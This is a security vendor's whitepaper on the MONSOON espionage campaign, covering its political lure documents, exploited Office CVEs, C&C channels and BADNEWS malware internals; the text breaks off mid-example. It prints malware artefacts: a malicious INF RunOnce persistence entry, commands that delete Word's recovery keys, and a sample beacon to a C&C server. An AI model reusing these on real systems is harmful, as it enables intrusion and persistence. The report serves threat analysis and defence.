# MONSOON – ANALYSIS OF AN APT CAMPAIGN ### ESPIONAGE AND DATA LOSS UNDER THE COVER OF CURRENT AFFAIRS **WRITTEN BY ANDY SETTLE, NICHOLAS GRIFFIN, ABEL TORO** ### Forcepoint™ Security Labs™ | Special Investigations ----- ### Forcepoint™ Security Labs™ | Special Investigations Figure 1 – Word-Cloud of Lure Document Titles “Our _MONSOON investigation has uncovered what is clearly a concerted and persistent campaign to steal_ _sensitive data from a variety of critical sources. The use of both current and topical themes [illustrated_ _above] as lures, not only indicates the precision level of targeting but also the targeting decision process_ _itself.”_ **_Andy Settle Head of Special Investigations_** #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 1/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations ## TABLE OF CONTENTS Executive Summary ...................................................................................................................................... 4 Acknowledgements ................................................................................................................................... 4 Summary of Observations ............................................................................................................................ 5 Key Features ............................................................................................................................................. 5 Adversary. ............................................................................................................................................. 5 Intent. .................................................................................................................................................... 5 Infrastructure ......................................................................................................................................... 5 Capability .............................................................................................................................................. 5 Victims ................................................................................................................................................... 5 Victims of Interest .................................................................................................................................. 5 Victim of Opportunity ............................................................................................................................. 5 Timeframe ............................................................................................................................................. 5 Technical Analysis ........................................................................................................................................ 6 Initial Discovery ......................................................................................................................................... 6 Pivoting via VirusTotal ........................................................................................................................... 6 Cyber Crime Bill. ................................................................................................................................... 6 Pivoting by Author. ................................................................................................................................ 6 Distribution Mechanism ......................................................................................................................... 9 E-Mail Lures & Malware Distribution ........................................................................................................ 10 Email Lures ......................................................................................................................................... 10 Topical News Lures ................................................................................................................................. 12 News Site ............................................................................................................................................ 12 Google Plus. ........................................................................................................................................ 13 Facebook. ........................................................................................................................................... 14 Twitter Account. ................................................................................................................................... 15 Malware Analysis ........................................................................................................................................ 16 Weaponised Documents ......................................................................................................................... 16 Exploitation of Known Vulnerabilities ................................................................................................... 16 BADNEWS Weaponised Documents ................................................................................................... 17 AutoIt Backdoor & Unknown Logger Weaponised Documents ............................................................ 19 TINYTYPHON Weaponised Documents .............................................................................................. 19 Potential Silverlight Exploit ...................................................................................................................... 20 Silverlight Profiling ............................................................................................................................... 21 BADNEWS Malware ................................................................................................................................ 22 DLL Side-Loading ................................................................................................................................ 22 Persistence ......................................................................................................................................... 22 C&C Channels ..................................................................................................................................... 23 C&C Mechanism ................................................................................................................................. 26 badnews_decoder.py .......................................................................................................................... 27 Command Set ..................................................................................................................................... 28 Keylogger ............................................................................................................................................ 29 Document Crawler ............................................................................................................................... 29 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 2/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations Window Message Processor ............................................................................................................... 29 Updater VBScript ................................................................................................................................. 30 AutoIt Backdoor ....................................................................................................................................... 30 Decompiled AutoIt Script ..................................................................................................................... 31 Document Exfiltration .......................................................................................................................... 31 Privilege Escalation. ............................................................................................................................ 31 PowerShell Second Stage & Metasploit Meterpreter ........................................................................... 32 Unknown Logger Public V 1.5 ................................................................................................................. 37 Configuration ....................................................................................................................................... 40 TINYTYPHON ......................................................................................................................................... 41 Configuration & Persistence ................................................................................................................ 41 Document Crawler ............................................................................................................................... 42 Victims ................................................................................................................................................. 44 Attribution ................................................................................................................................................... 47 Victims .................................................................................................................................................... 47 Adversaries ............................................................................................................................................. 47 Cui Bono? ........................................................................................................................................... 47 Infrastructure ........................................................................................................................................... 48 Indicators of Compromise ........................................................................................................................... 49 Lure URLs ............................................................................................................................................... 49 Weaponised Document Hashes (SHA1) .................................................................................................. 49 BADNEWS Malware Hashes (SHA1) ...................................................................................................... 50 AutoIt Malware Hashes (SHA1) ............................................................................................................... 50 TINYTYPHON Malware Hashes (SHA1) ................................................................................................. 50 Unknown Logger Malware Hashes (SHA1) ............................................................................................. 50 Miscellaneous Samples (SHA1) .............................................................................................................. 50 BADNEWS C&C ...................................................................................................................................... 50 AutoIt C&C .............................................................................................................................................. 51 Meterpreter C&C ..................................................................................................................................... 51 TINYTYPHON C&C ................................................................................................................................. 51 Names of Lure & Weaponised Files ........................................................................................................ 51 About Us .................................................................................................................................................... 55 Figures ....................................................................................................................................................... 56 References ................................................................................................................................................. 57 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 3/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations ## EXECUTIVE SUMMARY MONSOON is the name given to the Forcepoint Security Labs™ investigation into an ongoing espionage campaign that the Special Investigations team have been tracking and analysing since May 2016. The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia. It appears to have started in December 2015 and is still ongoing as of July 2016. Amongst the evidence gathered during the MONSOON investigation were a number of indicators which make it highly probable[1] that this adversary and the OPERATION HANGOVER [1], [2] adversary are one and the same. These indicator include the use of the same infrastructure for the attacks, similar Tactics, Techniques and Procedures (TTPs), the targeting of demographically similar victims and operating geographically within the Indian Subcontinent. _“More information is always_ _better than less. When_ _people know the reason_ _things are happening, even if_ _it's bad news, they can_ _adjust their expectations and_ _react accordingly. Keeping_ _people in the dark only_ _serves to stir negative_ _emotions”._ Simon Sinek The malware components used in MONSOON are typically distributed through weaponised documents sent through e-mail to specifically chosen targets. Themes of these documents are usually political in nature and taken from recent publications on topical current affairs. Several malware components have been used in this operation including Unknown Logger Public, TINYTYPHON, BADNEWS, and an AutoIt [3] backdoor. BADNEWS is particularly interesting, containing resilient command-and-control (C&C) capability using RSS feeds, Github, forums, blogs and Dynamic DNS hosts. This whitepaper provides an in-depth understanding and insight into the actors and their campaign. It includes detailed analysis and findings, previously undocumented malware components, victims, and infrastructure involved. #### ACKNOWLEDGEMENTS We would like to acknowledge both Kaspersky and Cymmetria [4] who have published their own research on the groups referred to as "PATCHWORK" and "DROPPER ELEPHANT". We also recognise the analysis by Blue Coat in tracking OPERATION HANGOVER in the past [1]. We would like to thank the wider Forcepoint Security Labs team for their help with our investigation. We would also like to give special thanks to Ran Mosessco for assisting with specific analysis. 1 SEE: “Uncertainty Yardstick”, Page 3-32 https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/311572/20110830_jdp2_00_ed3_with_change1.pdf #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 4/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations ## SUMMARY OF OBSERVATIONS #### KEY FEATURES - Customer" provided target list? **Adversary. Strong indication that this is conducted by** ##### Stage 1 Recon •Thematic and regional recon? themselves? the OPERATION HANGOVER group [1]. This group has been active since at least 2010 [2]. **Intent. Data Exfiltration.** - argeted email **Infrastructure. Non-traditional resilient and obscure** ##### Stage 2 - •Google+•Facebook C&C. Including GitHub, forums, news items and RSS Lure •Twitter feeds. - hinastrat[.com] **Capability. BADNEWS and TINYTYPHON malware.** Re-use of tool sets including: Metasploit, AutoIt Backdoor, MyDoom, Shellcode loading via Powershell, ##### Stage 3 - /A Unknown Logger. “PATCHWORK” [4]. ##### Redirect CVE Exploitation. Current News Lures – Lures via email with tracking images. ##### Stage 4 - •Weaponized documents Over 172 lure documents, most referencing topical news - ilverlight exploit ##### Exploitation •UAC bypass items, relevant to the victims of interest. Most common lure document: 2016_China_Military_PowerReport. **Victims. Over 110 different victim countries and 6,300** victim IP addresses. - ADNEWS ##### Stage 5 - •TINYTYPHON Victims of Interest. Government Agencies, Armed - utoIt Backdoor ##### Dropper •Unknown Logger Forces, Embassies: Sri Lanka, Ceylon, South Korean, - etasploit Metepreter **Victim of Opportunity. Those with passing interest in** Chinese military strategy being ‘snared’ by the lure web - SS site. Majority in China (61% of all victims) ##### Stage 6 - •GitHub - orums **Timeframe. Between December 2015 to July 2016** ##### Call Home •News Articles - ynamic DNS hosts ##### Stage 7 - ensitive Documents ##### Data Loss #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 5/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations ## TECHNICAL ANALYSIS #### INITIAL DISCOVERY **Pivoting via VirusTotal. Virus Total[2] (VT) Intelligence queries are often constructed in order to hunt for** new, unusual and interesting malware as part of the routine work performed by the Special Investigations team. The initial discovery of MONSOON stemmed from one of these queries. During such activities, an RTF document was identified that warranted further investigation. **Cyber Crime Bill. A specific document was singled-out for** analysis via VT for number of reasons. These included: a low detection rate, a low number of submissions, an interesting set of default languages including US English, Saudi Arabic and PRC Chinese, that it exploited a known vulnerability (CVE-2015-1641 [5]) and that it had filenames with political themes including “Microsoft Word _Telecommunications Policy - APPROVED.DOCX” and_ _"Cyber_Crime_bill.doc"[3]:_ This document was opened in a virtualised lab environment and was seen to “drop” malware. By analysing this malware is was possible to determine that it was not of a known or documented malware family. It contained interesting functionality that warranted further investigation (see below). This malware was named by Special Investigations as BADNEWS after its ability to use news sites and blogs to obtain its C&C address. **Pivoting by Author. By exploiting the document information** found in the original malicious RTF, the name of the user who last modified the document was identified: _PRELIMINARY_ _…_ _(1) This Act may be called the Prevention_ _of Electronic Crimes Act, 2015._ _(2) It extends to the whole of Pakistan._ _(3) It shall apply to every citizen of_ _Pakistan wherever he may be, and also_ _to every other person for the time being_ _in Pakistan._ _(4) It shall come into force at once._ _…_ Figure 2 – Cyber_Crime_Bill.doc (Excerpt) 2 https://www.virustotal.com/ 3 https://www.virustotal.com/en/file/34cdfc67942060ba30c1b9ac1db9bd042f0f8e487b805b8a3e1935b4d2508db6/analy sis/ #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 6/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations Using another VT search, the following 6 documents matching this author information were found: ``` File Size : 1407 kB File Type : RTF File Type Extension : rtf MIME Type : text/rtf Title : Microsoft Word - Telecommunications Policy - APPROVED.DOCX Author : mhjaved Last Modified By : ayyo Create Date : 2016:04:20 12:58:00 Modify Date : 2016:04:20 12:58:00 Revision Number : 2 Total Edit Time : 0 Pages : 12 Words : 7076 Characters : 40335 Company : Microsoft Characters With Spaces : 47317 Internal Version Number : 32859 ``` Figure 3 – EXIF info for Cyber_Crime_Bill.docx Figure 4 – Search VT by Author Metadata The low number of results, similar file sizes and the same CVE exploitation gave a high level of certainty that these documents belong to the same actor. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 7/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations The VT reports showed known names of some of these samples. One of the samples used genuine content from the National Institute for Defence Studies Japan document NIDS China Security Report 2016[4]. The specific filename used for this sample was _"china_report_EN_web_2016_A01.doc"._ Using Google to search for this specific filename returned three hits. Two of the results were for VT and another for a report on URLQuery.net. One of the VT results showed that the file was provided from a web server located on a host on IP address 37.58.60.195 and that it had also provided a number of other, similar files[5]. The other VT results referred to the analysis of the malicious file[6]. Figure 5 – Lure Document Cover **DATE** **TIME** **URL** 2016-05-31 18:51:31 hxxp://www.cnmilit.com/index.php?f=China_Security_Report_CN2016.pps 2016-05-10 00:56:37 hxxp://cnmilit.com/index.php/?f=China_Security_Report_2016.pps 2016-04-20 10:31:31 hxxp://www.cnmilit.com/index.php?f=The_PLA_s_New_Organizational_Structure_Parts_1_and_2 _01.doc 2016-04-17 18:02:41 hxxp://www.cnmilit.com/index.php?f=China_Security_Report_2016.pps Figure 6 – Lures from 37.58.60.195 4 http://www.nids.go.jp/english/publication/chinareport/ 5 https://www.virustotal.com/en/ip-address/37.58.60.195/information/ 6 https://www.virustotal.com/en/file/ebd4f62bb85f6de1111cbd613d2d4288728732edda9eb427fe9f51bd1f2d6db2/analys is/ #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 8/57 |DATE TIME URL|Col2|Col3| |---|---|---| |2016-05-31|18:51:31|hxxp://www.cnmilit.com/index.php?f=China_Security_Report_CN2016.pps| |2016-05-10|00:56:37|hxxp://cnmilit.com/index.php/?f=China_Security_Report_2016.pps| |2016-04-20|10:31:31|hxxp://www.cnmilit.com/index.php?f=The_PLA_s_New_Organizational_Structure_Parts_1_and_2 _01.doc| |2016-04-17|18:02:41|hxxp://www.cnmilit.com/index.php?f=China_Security_Report_2016.pps| Figure 5 – Lure Document Cover ----- ### Forcepoint™ Security Labs™ | Special Investigations **Distribution Mechanism. The final Google search result was a report generated by the URLQuery.net** site: Figure 7 – URLQuery.net The site t.ymlp50[.com] is a legitimate web and e-mail marketing service. It is owned and operated by the Belgian company Your Mailing List Provider (YMLP). Further Google searches of other document names revealed similar redirection chains using the same service. Consequently, it is reasonable to conclude that a number of “weaponised” documents were delivered using YMLP. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 9/57 Figure 7 – URLQuery.net is a legitimate web and e-mail marketing service. It is owned and operated by the Belgian company Your Mailing List Provider (YMLP). Further Google searches of other document names revealed similar redirection chains using the same service. Consequently, it is reasonable to conclude that a number of “weaponised” documents were delivered using YMLP. ----- ### Forcepoint™ Security Labs™ | Special Investigations #### E-MAIL LURES & MALWARE DISTRIBUTION **Email Lures. Using the information from the initial discoveries and correlating against the ‘known bad’** data collected by Forcepoint’s Triton® AP-Email it was possible to track down at least some of the targeted e-mail lures used by the HANGOVER group in the MONSOON campaign. The e-mail themes are typically current political events that may be of interest to the target recipient. It was possible to identify several Chinese politically themed e-mails linking to weaponised documents. A redacted example e-mail can be seen below. Figure 8 – Known Bad Email Lure #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 10/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations Using YMLP, the threat actor is faking the sender using this service and embedding a link to a weaponised document in the e-mail body. Examples of a number of email details and embedded URLs can be seen in the table below. UTC Time Subject Sender Embedded URL to Malicious Document 6/29/2016 The Chinese Statecraft, The China mailreturn@smtp5.ymlpsrvr.net hxxp://www.newsnstat[.com]/index.php?f=Report_Asia_Program 7:12 Syndrome and it's new legalism _New_Geopolitics.pps 6/28/2016 China Plans a Breakaway Faction of mailreturn@smtp6.ymlpsrvr.net hxxp://www.newsnstat[.com]/index.php?f=Report_Asia_Program 4:13 the NSG _New_Geopolitics.pps 6/27/2016 Stretching and Exploiting Thresholds mailreturn@smtp1.ymlpsrvr.net hxxp://www.newsnstat[.com]/index.php?f=China_plan_to_domin 5:08 for High Order War ate_South_China_Sea_and_beyond.doc 6/24/2016 2016年成都中国电子展。 mailreturn@smtp3.ymlpsrvr.net hxxp://www.newsnstat[.com]/index.php?f=CEF_Chengdu_July_2 4:52 016.pps 5/20/2016 Limits of Law in the South China Sea mailreturn@smtp6.ymlpsrvr.net hxxp://www.newsnstat[.com]/index.php?f=Limits_of_Law_in_the_ 8:56 South_China_Sea.pps 5/9/2016 China International Defence mailreturn@smtp5.ymlpsrvr.net hxxp://www.newsnstat[.com]/index.php?f=CIDEX2016.pps 5:16 Electronics Exhibition (CIDEX) 2016 4/12/2016 `中国安全战略报告2016` mailreturn@smtp2.ymlpsrvr.net hxxp://www.cnmilit[.com]/index.php?f=China_Security_Report_C 4:56 N2016.pps Figure 9 – YMLP Lures #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 11/57 |UTC Time Subject Sender Embedded URL to Malicious Document|Col2|Col3|Col4| |---|---|---|---| |6/29/2016 7:12|The Chinese Statecraft, The China Syndrome and it's new legalism|mailreturn@smtp5.ymlpsrvr.net|hxxp://www.newsnstat[.com]/index.php?f=Report_Asia_Program _New_Geopolitics.pps| |6/28/2016 4:13|China Plans a Breakaway Faction of the NSG|mailreturn@smtp6.ymlpsrvr.net|hxxp://www.newsnstat[.com]/index.php?f=Report_Asia_Program _New_Geopolitics.pps| |6/27/2016 5:08|Stretching and Exploiting Thresholds for High Order War|mailreturn@smtp1.ymlpsrvr.net|hxxp://www.newsnstat[.com]/index.php?f=China_plan_to_domin ate_South_China_Sea_and_beyond.doc| |6/24/2016 4:52|2016年成都中国电子展。|mailreturn@smtp3.ymlpsrvr.net|hxxp://www.newsnstat[.com]/index.php?f=CEF_Chengdu_July_2 016.pps| |5/20/2016 8:56|Limits of Law in the South China Sea|mailreturn@smtp6.ymlpsrvr.net|hxxp://www.newsnstat[.com]/index.php?f=Limits_of_Law_in_the_ South_China_Sea.pps| |5/9/2016 5:16|China International Defence Electronics Exhibition (CIDEX) 2016|mailreturn@smtp5.ymlpsrvr.net|hxxp://www.newsnstat[.com]/index.php?f=CIDEX2016.pps| |4/12/2016 4:56|中国安全战略报告2016|mailreturn@smtp2.ymlpsrvr.net|hxxp://www.cnmilit[.com]/index.php?f=China_Security_Report_C N2016.pps| ----- ### Forcepoint™ Security Labs™ | Special Investigations #### TOPICAL NEWS LURES **News Site. The attackers are also operating a fake political news site at chinastrat[.com].** The “downloads” section of this website contains similarly weaponised documents to the ones sent by email and these documents drop the same malware families. It is reasonable to suggest that the login credentials from anybody who registers on the site are also harvested. Figure 10 – China Strat Screen Shot #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 12/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Google Plus. The actors have been operating a Google Plus account since December 2014. This** account is used to post links to the actors’ fake news site. Figure 11 – Lure Google+ Screen Shot #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 13/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Facebook. The actors operate a Facebook account. This account is also used to post links to the actors’** fake news site. Figure 12 – Lure Facebook Screen Shot #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 14/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Twitter Account. The actors have operated a Twitter account since December 2014 and use this in a** similar manner to their Google+ and Facebook account. Figure 13 – Lure Twitter Screen Shot #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 15/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations ## MALWARE ANALYSIS #### WEAPONISED DOCUMENTS **Exploitation of Known Vulnerabilities. Several document types and document exploits have been used** in the MONSOON campaign to deliver various malware components. It is reasonable to suggest that the actors are using a malicious document builder to quickly weaponise legitimate documents. The following vulnerabilities have been identified within the attackers' documents: **Vulnerability** **Description** CVE-2012-0158 Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code CVE-2014-6352 Microsoft Windows CVE-2014-6352 OLE Package Manager Remote Code Execution Vulnerability CVE-2015-1641 Microsoft Office Memory Errors Let Remote Users Execute Arbitrary Code and Input Validation Flaw Permits Cross-Site Scripting Attacks Figure 14 – Exploited CVEs #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 16/57 |Vulnerability Description|Col2| |---|---| |CVE-2012-0158|Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code| |CVE-2014-6352|Microsoft Windows CVE-2014-6352 OLE Package Manager Remote Code Execution Vulnerability| |CVE-2015-1641|Microsoft Office Memory Errors Let Remote Users Execute Arbitrary Code and Input Validation Flaw Permits Cross-Site Scripting Attacks| ----- ### Forcepoint™ Security Labs™ | Special Investigations **BADNEWS Weaponised Documents. The BADNEWS malware is typically packaged into a malicious** document via an encrypted binary blob within that document. This binary blob often contains a legitimate decoy document that is shown to the user. On other occasions the decoy document is downloaded directly. CVE-2015-1641 has been observed as being exploited to drop BADNEWS. When the document exploit is triggered, the shellcode will drop the binary blob into the user's %temp% folder along with an encoded VBScript: Figure 15 – Binary Blob Dropped to %temp% The encoded VBScript uses a file extension which is not associated, by default, as being a VBScript file. The extensions .domx and .lgx have been observed. The shellcode is responsible for adding a new file association for the file extension which specifies that they should be interpreted as an encoded VBScript. Finally, the shellcode executes the encoded VBScript file which will extract the encrypted files from the binary blob, show the decoy document (if there is one), and execute the malware. The VBScript hard-coded sizes of the files to extract from the binary blob: Figure 16 – VB Extract of Blob #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 17/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations The decryption routine uses the encryption key "ludos”[7] to decrypt 32-byte chunks of the embedded files: Figure 17 – VB Decryption of Embedded Files Our analysis of BADNEWS can be found later in this document [Page: 22] 7 http://starwars.wikia.com/wiki/Ludos #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 18/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **AutoIt Backdoor & Unknown Logger Weaponised Documents. The majority of weaponised documents** drop an AutoIt backdoor. Documents exploiting CVE-2014-6352 have been observed installing the malware via the following INF: ``` [Version] Signature = "$CHICAGO$" class=61883 ClasGuid={2E87RBCD-7488-12T1-QYXX-74521ACV1AS4} DriverVer=0/21/2006,61.7600.16385 [DestinationDirs] DefaultDestDir = 1 [DefaultInstall] AddReg = RxStart [RxStart] HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\sysvolinfo.exe ``` The malware executable name varies. The following are some of the names we have observed: - sysvolinfo.exe - svchost.exe - rar.exe - 360configuration_patch_update_2016v4.exe The AutoIt script is always roughly the same, but some versions contain less functionality. A full analysis of the AutoIt backdoor can be found later in this document [Page: 30]. Malware known as Unknown Logger has also been dropped by the same sort of weaponised document. A full analysis of Unknown Logger can also be found later in this document [Page: 37]. **TINYTYPHON Weaponised Documents. A third malware used in MONSOON is a small backdoor based** on publicly available code from the MyDoom [6] worm. This malware will crawl mapped drives for documents and upload them to its C&C. We have seen this dropped by an RTF exploiting CVE-2012-0158 under the name "DPP_INDIA_2016.doc"[8]. The document contains shellcode which drops a file under %temp%\svchost.exe and then attempts to disable Word's recovery features via the following commands: ``` cmd.exe /c reg delete "HKCU\Software\Microsoft\Office\14.0\Word\Resiliency" /F cmd.exe /c reg delete "HKCU\Software\Microsoft\Office\12.0\Word\Resiliency" /F ``` The svchost.exe[9] dropped by the document executes an embedded, base64 encoded malware component that we have named "TINYTYPHON". Our analysis of this malware can be found later in this document [Page: 41]. 8 http://starwars.wikia.com/wiki/Ludos 9 SHA1: 411387df2145039fc601bf38192b721388cc5141 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 19/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations #### POTENTIAL SILVERLIGHT EXPLOIT The weaponised document sites such as cnmilit[.com] and newsnstat[.com] will attempt to redirect the user to lite.php after 10 seconds: Figure 18 – PHP Redirect It was not possible to access cnmilit[.com] as of May 27, 2016. It was therefore not possible to analyse the pages served. However, it was possible to browse to lite.php on newsnstat[.com]. The content of this page always remained the same over the duration of the investigation. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 20/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Silverlight Profiling. The code profiles whether a system has Microsoft Silverlight installed. The site then** requests lite.php?name= where the value of name is 'true' or 'false' depending on whether Silverlight is installed and accessible or not. No further content was served from lite.php during the investigation. A likely scenario is that the attackers may have wanted to use a Silverlight exploit to execute the malware in the case of a user who does not open or get successfully exploited by the weaponised document. This could have been intended as an exploitation of something like CVE-2016-0034 which is known to have been adopted by exploit kits back in February 2016 and which pre-dates MONSOON. ``` HTTP/1.1 200 OK Date: Fri, 27 May 2016 22:32:29 GMT Server: Apache X-Powered-By: PHP/5.5.12 Content-Length: 749 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html ``` Figure 19 – Silverlight Profiling #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 21/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations #### BADNEWS MALWARE The BADNEWS malware is capable of arbitrary command execution, screenshots, self-updating, downloading and executing files, and directory listings. The name was given due to its use of RSS feeds, forums, blogs and Dynamic DNS providers for its C&C infrastructure. BADNEWS uses a DLL side-loading technique with a signed Java binary in order to evade security solutions. It is a first stage malware that is likely to receive second stage malware components if the target is of interest, although we did not observe this behaviour. **DLL Side-Loading. The BADNEWS DLL is typically side-loaded into a legitimate signed Java executable.** A specific weaponised document analysed[10] drops a binary blob and an encoded VBScript file which then extracts a decoy document along with the following 3 files: - MicroScMgmt.exe - msvcr71.dll - jli.dll _MicroScMgmt.exe_ is a renamed version of the legitimate Java Runtime's 6.0.390.4 binary named java_rmi.exe and is signed by Sun Microsystems. This application requires the legitimate msvcr71.dll and also_ requires a DLL named jli.dll. However, the jli.dll here contains the BADNEWS malware. When MicroScMgmt.exe is executed, it will load up the malicious jli.dll and ultimately call the _JLI_WildcardExpandClasspath_0 export in the DLL. At this point the BADNEWS code will take over and_ begin performing its malicious routines. This technique is a stealth tactic to evade anti-malware solutions which are notoriously weak at detecting side-loaded malware. The malware will spawn 2 threads, one to perform key-logging and one to crawl the local hard-drives for document files. **Persistence. BADNEWS installs a registry key under** _HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run_ in order to remain persistent on the system. Figure 20 – Windows Registry Keys 10 SHA1: 11064dcef86ac1d94c170b24215854efb8aad542 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 22/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **C&C Channels. BADNEWS is typically built with several hard-coded channels which it can use to obtain** commands or change its C&C. These C&C channels include RSS feeds, Github, forums, blogs and Dynamic DNS hosts. In the sample analysed, the malware had several hard-coded C&C channels although some were corrupted and did not work correctly: ``` hxxp://feeds.rapidfeeds.com/81913/ hxxps://raw.githubusercontent.com/azeemkhan89/cartoon/master/cart.xml hxxp://www.webrss.com/createfeed.phpfeedid=47448 hxxp://www.webrss.com/createfeed.phpfeedid=47449 hxxp://www.chinasmack.com/2016/digest/chinese-tourist-bit-by-snake-in-thailand.html hxxp://www.travelhoneymoon.wordpress.com/2016/03/30/tips-to-how-to-feel-happy hxxp://overthemontains.weebly.com/trekking-lovers hxxp://tariqj.crabdance.com/tesla/ghsnls.php hxxp://javedtar.chickenkiller.com/tesla/ghsnls.php hxxp://asatar.ignorelist.com/tesla/ghsnls.php ``` The first 7 C&Cs are referred to by the malware as either a "blog" or a "feed". These channels are only used to tell the malware where its real C&C is. The last 3 Dynamic DNS channels are back-up C&Cs in case it is not able to obtain a C&C address from one of the blogs or feeds. The Dynamic DNS back-up C&Cs typically use the same “ghsnls.php” filename but the directory name changes for different builds of the malware. The directory may indicate a campaign identifier or a codeword for the target victim of the malware. We have seen the following directories used: - tesla - Tussmal - Mussmal - quantum - yumhong #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 23/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations When a C&C is obtained from a blog or feed, it is extracted from the page by searching for "{{" in the content. A GitHub example[11] is below: Figure 21 – GitHub Command Channel Another example taken from a comment by a user called "Zubaid[12]" posted on chinasmack[.com]: Figure 22 – Chinasmack[.com] Command Channel 11 https://github.com/azeemkhan89/ 12 https://en.wikipedia.org/wiki/Zubaid #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 24/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations And a final example taken from forum.china.org.cn: Figure 23 – Forum Command Channel The content after "{{" is the C&C address which is encrypted in the same manner as described below. Of note is that this text on the forum page is invisible, as the author has set it to white text on a white background. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 25/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **C&C Mechanism. Once BADNEWS has decided which C&C address to communicate with it will send off** some system information and await a command to execute. A unique identifier is computed for the victim which is based on the tick count from the victim machine when the malware was executed. This ID is saved in the file "%temp%\T89.dat". ``` POST http://85.25.79.230/tesla/ghsnls.php HTTP/1.1 Accept: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded User-Agent: UserAgent:Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.1(KHTML,like Gecko)Chrome/21.0.1180.75Safari/537.1 Host: 85.25.79.230 Content-Length: 249 Cache-Control: no-cache esmqss=**redacted**&btcbumegy=**redacted**&pxckhj=**redacted**&xyvqq=**redacted** #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 26/57 ``` ----- ### Forcepoint™ Security Labs™ | Special Investigations The encryption mechanism used for all C&C data is done by taking each byte and performing a ROR by 3 bits and then an XOR by 0x23. The result of this is then converted into a hexadecimal representation of the bytes, and finally encoded into base64. Below is a Python script written to decrypt the data: **badnews_decoder.py** ``` import sys, getopt import base64 # Rotate left: 0b1001 --> 0b0011 rol = lambda val, r_bits, max_bits: \ (val << r_bits%max_bits) & (2**max_bits-1) | \ ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) # Rotate right: 0b1001 --> 0b1100 ror = lambda val, r_bits, max_bits: \ ((val & (2**max_bits-1)) >> r_bits%max_bits) | \ (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) if len(sys.argv) != 2: exit("Usage: badnews_decoder.py ") data = sys.argv[1] # Print original data input print "[1] Original: " + data data = base64.b64decode(data) # Print the base64 decoded hex byte string print "[2] Base64 dec: " + data # Decode the hex bytes into to binary data data = data.decode("hex") decdata = '' # XOR each byte by 0x23 and rotate left by 3 bits for x in range(len(data)): c = ord(data[x]) c ^= 0x23 c = rol(c, 3, 8) decdata += chr(c) # Null terminate decdata += '\x00' # Print the final decrypted data print "[3] Decrypted: " + decdata ``` An example of the input and output for this script: ``` >badnews_decoder.py 